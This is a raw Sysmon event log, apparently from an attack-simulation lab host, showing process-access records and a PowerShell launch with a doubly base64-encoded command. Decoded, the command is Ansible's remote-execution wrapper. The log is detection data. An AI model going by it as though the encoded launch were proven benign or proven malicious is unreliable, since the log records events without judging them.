13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.005{10ACEC4A-8580-5FCF-AD00-000000009101}42324800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66672516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b072d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b133f7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65af9222(wow64) 154100x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:09.009{10ACEC4A-8581-5FCF-AE00-000000009101}4796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8580-5FCF-AD00-000000009101}4232C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A 10341000x80000000000000003639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.878{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 